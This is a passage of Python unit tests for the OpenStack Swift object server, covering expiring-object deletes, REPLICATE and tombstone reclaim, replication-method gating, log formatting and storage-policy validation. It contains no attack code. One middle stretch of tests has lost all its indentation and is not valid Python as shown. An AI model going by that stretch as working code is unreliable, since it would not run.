            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': test_timestamp,
                     'X-Delete-At': delete_at_timestamp,
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # sanity
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'X-Timestamp': test_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.body, 'TEST')
        # Locate the .data file on disk so we can watch it come and go.
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(test_timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))

        # move time past expiry
        with mock.patch('swift.obj.diskfile.time') as mock_time:
            mock_time.time.return_value = test_time + 100
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': test_timestamp})
            resp = req.get_response(self.object_controller)
            # request will 404
            self.assertEqual(resp.status_int, 404)
            # but file still exists
            self.assertTrue(os.path.isfile(objfile))

        # make the x-if-delete-at with some wrong bits
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': delete_at_timestamp,
                     'X-If-Delete-At': int(time() + 1)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        self.assertTrue(os.path.isfile(objfile))

        # make the x-if-delete-at with all the right bits
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': delete_at_timestamp,
                     'X-If-Delete-At': delete_at_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        self.assertFalse(os.path.isfile(objfile))

        # make the x-if-delete-at with all the right bits (again)
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': delete_at_timestamp,
                     'X-If-Delete-At': delete_at_timestamp})
        resp = req.get_response(self.object_controller)
        # already deleted, so the precondition now fails
        self.assertEqual(resp.status_int, 412)
        self.assertFalse(os.path.isfile(objfile))

        # make the x-if-delete-at for some not found
        req = Request.blank(
            '/sda1/p/a/c/o-not-found',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': delete_at_timestamp,
                     'X-If-Delete-At': delete_at_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    def test_DELETE_if_delete_at(self):
        # X-If-Delete-At is honoured on DELETE: it 412s unless it matches
        # the object's current X-Delete-At exactly, and a non-integer
        # value is a 400.
        test_time = time() + 10000
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 99),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # DELETE without X-If-Delete-At works normally.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 98)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)

        delete_at_timestamp = int(test_time - 1)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 97),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # X-If-Delete-At that doesn't match the stored expiry -> 412.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 95),
                     'X-If-Delete-At': str(int(test_time))})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)

        # No X-If-Delete-At at all still deletes unconditionally.
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 95)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)

        delete_at_timestamp = int(test_time - 1)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 94),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)

        # Mismatched X-If-Delete-At -> 412 again.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': str(int(test_time))})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)

        # Matching X-If-Delete-At -> the object is removed (204).
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': delete_at_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)

        # Non-integer X-If-Delete-At -> 400.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': 'abc'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_DELETE_calls_delete_at(self):
        # DELETE of an expiring object must issue a 'DELETE' call to
        # delete_at_update so the pending expirer entry is cancelled.
        given_args = []

        def fake_delete_at_update(*args):
            given_args.extend(args)
        # Capture the arguments instead of doing the real container update.
        self.object_controller.delete_at_update = fake_delete_at_update

        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = int(time() + 1000)
        # Integer division rounds the expiry down to its expirer container.
        delete_at_container1 = str(
            delete_at_timestamp1 /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': str(delete_at_timestamp1),
                     'X-Delete-At-Container': delete_at_container1})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # given_args[5] is the Request object passed through to the update.
        self.assertEqual(given_args, [
            'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
            given_args[5], 'sda1', POLICIES[0]])

        while given_args:
            given_args.pop()

        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        # The DELETE cancels the previously scheduled expiry.
        self.assertEqual(given_args, [
            'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
            given_args[5], 'sda1', POLICIES[0]])
def test_PUT_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': str(int(time() - 1)),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_POST_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time() + 1),
'X-Delete-At': str(int(time() - 1))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_REPLICATE_works(self):
def fake_get_hashes(*args, **kwargs):
return 0, {1: 2}
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
p_data = pickle.loads(resp.body)
self.assertEqual(p_data, {1: 2})
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_timeout(self):
def fake_get_hashes(*args, **kwargs):
raise Timeout()
def my_tpool_execute(func, *args, **kwargs):
return func(*args, **kwargs)
was_get_hashes = diskfile.DiskFileManager._get_hashes
was_tpool_exe = tpool.execute
try:
diskfile.DiskFileManager._get_hashes = fake_get_hashes
tpool.execute = my_tpool_execute
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
self.assertRaises(Timeout, self.object_controller.REPLICATE, req)
finally:
tpool.execute = was_tpool_exe
diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_insufficient_storage(self):
conf = {'devices': self.testdir, 'mount_check': 'true'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
def fake_check_mount(*args, **kwargs):
return False
with mock.patch("swift.obj.diskfile.check_mount", fake_check_mount):
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
    def test_REPLICATE_reclaims_tombstones(self):
        # REPLICATE rehashes suffixes; once reclaim_age has elapsed the
        # rehash reaps tombstones, a late DELETE doesn't even create one,
        # and REPLICATE cleans up the leftover hash directory.
        conf = {'devices': self.testdir, 'mount_check': False,
                'reclaim_age': 100}
        self.object_controller = object_server.ObjectController(
            conf, logger=self.logger)
        for policy in self.iter_policies():
            # create a tombstone
            ts = next(self.ts)
            delete_request = Request.blank(
                '/sda1/0/a/c/o', method='DELETE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                    'x-timestamp': ts.internal,
                })
            resp = delete_request.get_response(self.object_controller)
            # object never existed, but the DELETE still leaves a tombstone
            self.assertEqual(resp.status_int, 404)
            objfile = self.df_mgr.get_diskfile('sda1', '0', 'a', 'c', 'o',
                                               policy=policy)
            tombstone_file = os.path.join(objfile._datadir,
                                          '%s.ts' % ts.internal)
            self.assertTrue(os.path.exists(tombstone_file))

            # REPLICATE will hash it
            req = Request.blank(
                '/sda1/0', method='REPLICATE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                })
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            suffix = pickle.loads(resp.body).keys()[0]
            self.assertEqual(suffix, os.path.basename(
                os.path.dirname(objfile._datadir)))
            # tombstone still exists
            self.assertTrue(os.path.exists(tombstone_file))

            # after reclaim REPLICATE will rehash
            replicate_request = Request.blank(
                '/sda1/0/%s' % suffix, method='REPLICATE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                })
            # push diskfile's clock past reclaim_age (100s)
            the_future = time() + 200
            with mock.patch('swift.obj.diskfile.time.time') as mock_time:
                mock_time.return_value = the_future
                resp = replicate_request.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            self.assertEqual({}, pickle.loads(resp.body))
            # and tombstone is reaped!
            self.assertFalse(os.path.exists(tombstone_file))

            # N.B. with a small reclaim age like this - if proxy clocks get far
            # enough out of whack ...
            with mock.patch('swift.obj.diskfile.time.time') as mock_time:
                mock_time.return_value = the_future
                resp = delete_request.get_response(self.object_controller)
                # we won't even create the tombstone
                self.assertFalse(os.path.exists(tombstone_file))
                # hashdir sticks around tho
                self.assertTrue(os.path.exists(objfile._datadir))
            # REPLICATE will clean it all up
            resp = replicate_request.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            self.assertEqual({}, pickle.loads(resp.body))
            self.assertFalse(os.path.exists(objfile._datadir))
def test_SSYNC_can_be_called(self):
req = Request.blank('/sda1/0',
environ={'REQUEST_METHOD': 'SSYNC'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_PUT_with_full_drive(self):
class IgnoredBody(object):
def __init__(self):
self.read_called = False
def read(self, size=-1):
if not self.read_called:
self.read_called = True
return 'VERIFY'
return ''
def fake_fallocate(fd, size):
raise OSError(errno.ENOSPC, os.strerror(errno.ENOSPC))
orig_fallocate = diskfile.fallocate
try:
diskfile.fallocate = fake_fallocate
timestamp = normalize_timestamp(time())
body_reader = IgnoredBody()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT',
'wsgi.input': body_reader},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'Expect': '100-continue'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
self.assertFalse(body_reader.read_called)
finally:
diskfile.fallocate = orig_fallocate
def test_global_conf_callback_does_nothing(self):
preloaded_app_conf = {}
global_conf = {}
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {})
self.assertEqual(global_conf.keys(), ['replication_semaphore'])
try:
value = global_conf['replication_semaphore'][0].get_value()
except NotImplementedError:
# On some operating systems (at a minimum, OS X) it's not possible
# to introspect the value of a semaphore
raise SkipTest
else:
self.assertEqual(value, 4)
def test_global_conf_callback_replication_semaphore(self):
preloaded_app_conf = {'replication_concurrency': 123}
global_conf = {}
with mock.patch.object(
object_server.multiprocessing, 'BoundedSemaphore',
return_value='test1') as mocked_Semaphore:
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {'replication_concurrency': 123})
self.assertEqual(global_conf, {'replication_semaphore': ['test1']})
mocked_Semaphore.assert_called_once_with(123)
def test_handling_of_replication_semaphore_config(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
objsrv = object_server.ObjectController(conf)
self.assertTrue(objsrv.replication_semaphore is None)
conf['replication_semaphore'] = ['sema']
objsrv = object_server.ObjectController(conf)
self.assertEqual(objsrv.replication_semaphore, 'sema')
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEqual(
object_server.ObjectController(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(
object_server.ObjectController(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(
object_server.ObjectController(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE', 'SSYNC']
for method_name in obj_methods:
method = getattr(self.object_controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.object_controller, method_name)
self.assertEqual(method.replication, True)
    def test_correct_allowed_method(self):
        # Test correct work for allowed method using
        # swift.obj.server.ObjectController.__call__
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        # replication_server false: only non-replication verbs are exposed;
        # PUT is one of them and should be dispatched normally.
        self.object_controller = object_server.app_factory(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'})

        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)

        method = 'PUT'
        # Minimal WSGI environ for a PUT to /sda1/p/a/c/o.
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}

        method_res = mock.MagicMock()
        # Replace the PUT handler with a public mock; __call__ should route
        # the request to it and return its response unchanged.
        mock_method = public(lambda x:
                             mock.MagicMock(return_value=method_res))
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            response = self.object_controller(env, start_response)
            self.assertEqual(response, method_res)
    def test_not_allowed_method(self):
        # Test correct work for NOT allowed method using
        # swift.obj.server.ObjectController.__call__
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'}, logger=self.logger)

        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)

        method = 'PUT'
        # Minimal WSGI environ for a PUT to /sda1/p/a/c/o.
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}

        answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
                  'allowed for this resource.</p></html>']
        # Mark the PUT handler as a replication method; with
        # replication_server false it must be refused with a 405.
        mock_method = replication(public(lambda x: mock.MagicMock()))
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            mock_method.replication = True
            # Pin time/gmtime/getpid so the access-log line is predictable.
            with mock.patch('time.gmtime',
                            mock.MagicMock(side_effect=[gmtime(10001.0)])):
                with mock.patch('time.time',
                                mock.MagicMock(side_effect=[10000.0,
                                                            10001.0])):
                    with mock.patch('os.getpid',
                                    mock.MagicMock(return_value=1234)):
                        response = self.object_controller.__call__(
                            env, start_response)
                        self.assertEqual(response, answer)
                        self.assertEqual(
                            self.logger.get_lines_for_level('info'),
                            ['None - - [01/Jan/1970:02:46:41 +0000] "PUT'
                             ' /sda1/p/a/c/o" 405 - "-" "-" "-" 1.0000 "-"'
                             ' 1234 -'])
    def test_call_incorrect_replication_method(self):
        # With replication_server true, only replication verbs are allowed;
        # every ordinary object verb must come back 405.
        inbuf = StringIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'true'}, logger=FakeLogger())

        def start_response(*args):
            """Sends args to outbuf"""
            outbuf.writelines(args)

        obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST', 'OPTIONS']
        for method in obj_methods:
            # Minimal WSGI environ; only REQUEST_METHOD varies per verb.
            env = {'REQUEST_METHOD': method,
                   'SCRIPT_NAME': '',
                   'PATH_INFO': '/sda1/p/a/c',
                   'SERVER_NAME': '127.0.0.1',
                   'SERVER_PORT': '8080',
                   'SERVER_PROTOCOL': 'HTTP/1.0',
                   'CONTENT_LENGTH': '0',
                   'wsgi.version': (1, 0),
                   'wsgi.url_scheme': 'http',
                   'wsgi.input': inbuf,
                   'wsgi.errors': errbuf,
                   'wsgi.multithread': False,
                   'wsgi.multiprocess': False,
                   'wsgi.run_once': False}
            self.object_controller(env, start_response)
            self.assertEqual(errbuf.getvalue(), '')
            # outbuf accumulates; the first status written must be a 405.
            self.assertEqual(outbuf.getvalue()[:4], '405 ')
    def test_not_utf8_and_not_logging_requests(self):
        """A path containing a NULL byte is rejected with an 'Invalid UTF8'
        body, and with log_requests=false no access-log line is written."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false'},
            logger=FakeLogger())
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/\x00%20/%',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        answer = ['Invalid UTF8 or contains NULL']
        mock_method = public(lambda x: mock.MagicMock())
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            response = self.object_controller.__call__(env, start_response)
            self.assertEqual(response, answer)
            # log_requests is off, so no access-log line was emitted
            self.assertEqual(self.logger.get_lines_for_level('info'), [])
    def test__call__returns_500(self):
        """An unexpected exception in a handler yields a traceback body and
        an ERROR log line, but no access-log (info) line."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.logger = debug_logger('test')
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false'},
            logger=self.logger)
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        @public
        def mock_put_method(*args, **kwargs):
            # stand-in PUT handler that always blows up
            raise Exception()
        with mock.patch.object(self.object_controller, method,
                               new=mock_put_method):
            response = self.object_controller.__call__(env, start_response)
            self.assertTrue(response[0].startswith(
                'Traceback (most recent call last):'))
            self.assertEqual(self.logger.get_lines_for_level('error'), [
                'ERROR __call__ error with %(method)s %(path)s : ' % {
                    'method': 'PUT', 'path': '/sda1/p/a/c/o'},
            ])
            self.assertEqual(self.logger.get_lines_for_level('info'), [])
    def test_PUT_slow(self):
        """With slow=10 configured, a request that took 1s (mocked clock)
        sleeps for the remaining 9s before returning."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false',
             'slow': '10'},
            logger=self.logger)
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        mock_method = public(lambda x: mock.MagicMock())
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            with mock.patch('time.time',
                            mock.MagicMock(side_effect=[10000.0,
                                                        10001.0])):
                with mock.patch('swift.obj.server.sleep',
                                mock.MagicMock()) as ms:
                    self.object_controller.__call__(env, start_response)
                    # slow=10 minus the 1s elapsed on the mocked clock
                    ms.assert_called_with(9)
                    self.assertEqual(self.logger.get_lines_for_level('info'),
                                     [])
    def test_log_line_format(self):
        """The access-log line carries client IP, timestamp, request line,
        status, duration and pid in the expected format (clock mocked)."""
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
        self.object_controller.logger = self.logger
        with mock.patch(
                'time.gmtime', mock.MagicMock(side_effect=[gmtime(10001.0)])):
            with mock.patch(
                    'time.time',
                    mock.MagicMock(side_effect=[10000.0, 10001.0, 10002.0])):
                with mock.patch(
                        'os.getpid', mock.MagicMock(return_value=1234)):
                    req.get_response(self.object_controller)
        self.assertEqual(
            self.logger.get_lines_for_level('info'),
            ['1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD /sda1/p/a/c/o" '
             '404 - "-" "-" "-" 2.0000 "-" 1234 -'])
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one', False)])
    def test_dynamic_datadir(self):
        """PUTs land in the per-policy datadir: objects-1 for policy index 1,
        plain objects/ when no policy index header is sent (policy 0)."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'Baz': 'bazheader',
                                     'X-Backend-Storage-Policy-Index': 1,
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        object_dir = self.testdir + "/sda1/objects-1"
        self.assertFalse(os.path.isdir(object_dir))
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertTrue(os.path.isdir(object_dir))
        # make sure no idx in header uses policy 0 data_dir
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'Baz': 'bazheader',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        object_dir = self.testdir + "/sda1/objects"
        self.assertFalse(os.path.isdir(object_dir))
        with mock.patch.object(POLICIES, 'get_by_index',
                               lambda _: True):
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 201)
            self.assertTrue(os.path.isdir(object_dir))
    def test_storage_policy_index_is_validated(self):
        """Known policy indexes succeed for every verb; an index past the
        configured policies gets 503 and creates no datadir."""
        # sanity check that index for existing policy is ok
        methods = ('PUT', 'POST', 'GET', 'HEAD', 'REPLICATE', 'DELETE')
        valid_indices = sorted([int(policy) for policy in POLICIES])
        for index in valid_indices:
            object_dir = self.testdir + "/sda1/objects"
            if index > 0:
                object_dir = "%s-%s" % (object_dir, index)
            self.assertFalse(os.path.isdir(object_dir))
            for method in methods:
                headers = {
                    'X-Timestamp': next(self.ts).internal,
                    'Content-Type': 'application/x-test',
                    'X-Backend-Storage-Policy-Index': index}
                if POLICIES[index].policy_type == EC_POLICY:
                    # EC PUTs require a fragment index
                    headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
                req = Request.blank(
                    '/sda1/p/a/c/o',
                    environ={'REQUEST_METHOD': method},
                    headers=headers)
                req.body = 'VERIFY'
                resp = req.get_response(self.object_controller)
                self.assertTrue(is_success(resp.status_int),
                                '%s method failed: %r' % (method, resp.status))
        # index for non-existent policy should return 503
        index = valid_indices[-1] + 1
        for method in methods:
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': method},
                                headers={
                                    'X-Timestamp': next(self.ts).internal,
                                    'Content-Type': 'application/x-test',
                                    'X-Backend-Storage-Policy-Index': index})
            req.body = 'VERIFY'
            object_dir = self.testdir + "/sda1/objects-%s" % index
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 503)
            self.assertFalse(os.path.isdir(object_dir))
    def test_race_doesnt_quarantine(self):
        """A PUT racing a DELETE (injected between the DELETE's listdir and
        metadata read via an os.listdir patch) must not quarantine the
        object; the newer PUT wins."""
        existing_timestamp = normalize_timestamp(time())
        delete_timestamp = normalize_timestamp(time() + 1)
        put_timestamp = normalize_timestamp(time() + 2)
        # make a .ts
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': existing_timestamp})
        req.get_response(self.object_controller)
        # force a PUT between the listdir and read_metadata of a DELETE
        put_once = [False]
        orig_listdir = os.listdir
        def mock_listdir(path):
            # first call only: sneak a newer PUT in under the DELETE
            listing = orig_listdir(path)
            if not put_once[0]:
                put_once[0] = True
